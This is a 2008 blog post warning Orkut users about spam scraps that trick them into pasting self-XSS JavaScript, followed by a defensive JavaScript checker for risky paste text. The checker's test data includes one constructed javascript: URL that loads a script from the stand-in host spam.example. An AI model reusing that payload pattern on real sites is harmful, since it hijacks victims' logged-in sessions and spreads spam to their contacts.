Monday, April 14, 2008

Orkut: Beware of Spammers and Click safely

Orkut, Google's answer to MySpace and Facebook in the social networking arena, has recently got me really frustrated. Orkut is a popular social network among Brazilians and Indians, who account for more than 80% of the site's traffic.
Coming from a company like Google, one would expect high standards of security and privacy controls, but the recent exploits are sadly discouraging.

Orkut is overflowing with spam and XSS attacks. They arrive as friendly-looking scraps that ask you to click on some link or paste some code into your browser's address bar to see something cool. Doing so runs a JavaScript that gets access to your contacts and private data, and the rest is left to the attacker's creativity. One recent spam I received was like this:

Now if you receive this from a really good friend, you would be excited to know which girl he is referring to. So I clicked to see her profile. On her profile, she mentions this mystery friend of hers and asks you to copy and run a piece of code to see his (her friend's) profile.

If you are smart, you would have guessed it's just another XSS attack. If you are smarter, you would paste this into your address bar and look for the location of the JavaScript. This is what I found:

Open this JavaScript in a text editor, and you will figure out what the script really does.

For interested folks: this scraps all your friends with the exact message that you received. Sometimes it amuses me how people have so much spare time to do such creative stuff, and people like me have to write about them. But in retrospect, it's dangerous, and I hope Google does something to fix this. There can be far-reaching implications like identity and credit card theft. My suggestion: view the source/link of anything that you click on, or you might regret that click all your life. Play Safe and Click safe :)
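To turn the advice above into something mechanical, here is a small "click safe" checker, added as an example and not code from the original post or from Orkut. Given text a scrap asks you to paste into the address bar (or a link's target), it reports whether the text would run script inside your logged-in session, undoing the case, whitespace and percent-encoding tricks browsers tolerate, and lists the hosts it pulls content from so you can look at the script's location before trusting it. The host `spam.example` and the sample inputs are constructed.

```javascript
// Added example (not from the original post): classify text before pasting it
// into the address bar or clicking it, in the spirit of "view the source/link".

function normalizePaste(text) {
  // Browsers drop tab/newline characters inside a URL and trim surrounding
  // whitespace, so "java\tscript:" still executes as javascript:. Mirror that.
  let t = String(text).trim().replace(/[\t\n\r]/g, "");
  // Undo one round of percent-encoding (e.g. "javascript%3A") when well-formed.
  try { t = decodeURIComponent(t); } catch (e) { /* keep the raw text */ }
  return t;
}

function classifyPaste(text) {
  const t = normalizePaste(text);
  const reasons = [];
  // Scheme check: these schemes execute in the page context with your session,
  // which is exactly what the Orkut scraps relied on.
  const scheme = t.match(/^([a-z][a-z0-9+.-]*):/i);
  if (scheme && /^(javascript|data|vbscript)$/i.test(scheme[1])) {
    reasons.push(`${scheme[1].toLowerCase()}: URL runs code with your session`);
  }
  // Location check: list every host referenced, so the reader can inspect
  // where the script actually comes from before running anything.
  const hosts = [];
  for (const m of t.matchAll(/https?:\/\/([^\s'"<>()\/]+)/gi)) {
    const h = m[1].toLowerCase();
    if (!hosts.includes(h)) hosts.push(h);
  }
  return { safe: reasons.length === 0, reasons, hosts };
}

// Constructed samples: a disguised self-XSS paste, and an ordinary profile link.
const SCRAP_PASTE =
  "  JaVa\tScRiPt:s=document.createElement('script');s.src='http://spam.example/x.js';document.body.appendChild(s)";
const PROFILE_LINK = "http://www.orkut.com/Profile.aspx?uid=CONSTRUCTED";

if (typeof require !== "undefined" && require.main === module) {
  console.log(classifyPaste(SCRAP_PASTE));  // safe: false, hosts: ['spam.example']
  console.log(classifyPaste(PROFILE_LINK)); // safe: true, hosts: ['www.orkut.com']
}
```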

Here is an interesting community that teaches and practices such exploits and bugs on Orkut: Bugs on Orkut


Anonymous said...

hey nice work man... I too am troubled by these XSS attacks. I once accidentally chose to see the contents and have been on alert since then. Nice to put it on the web, but not many people notice.

Anonymous said...

I can safely bet the inventor of this spam would not have spent more time analysing his work than you... kudos machan, keep up the good work.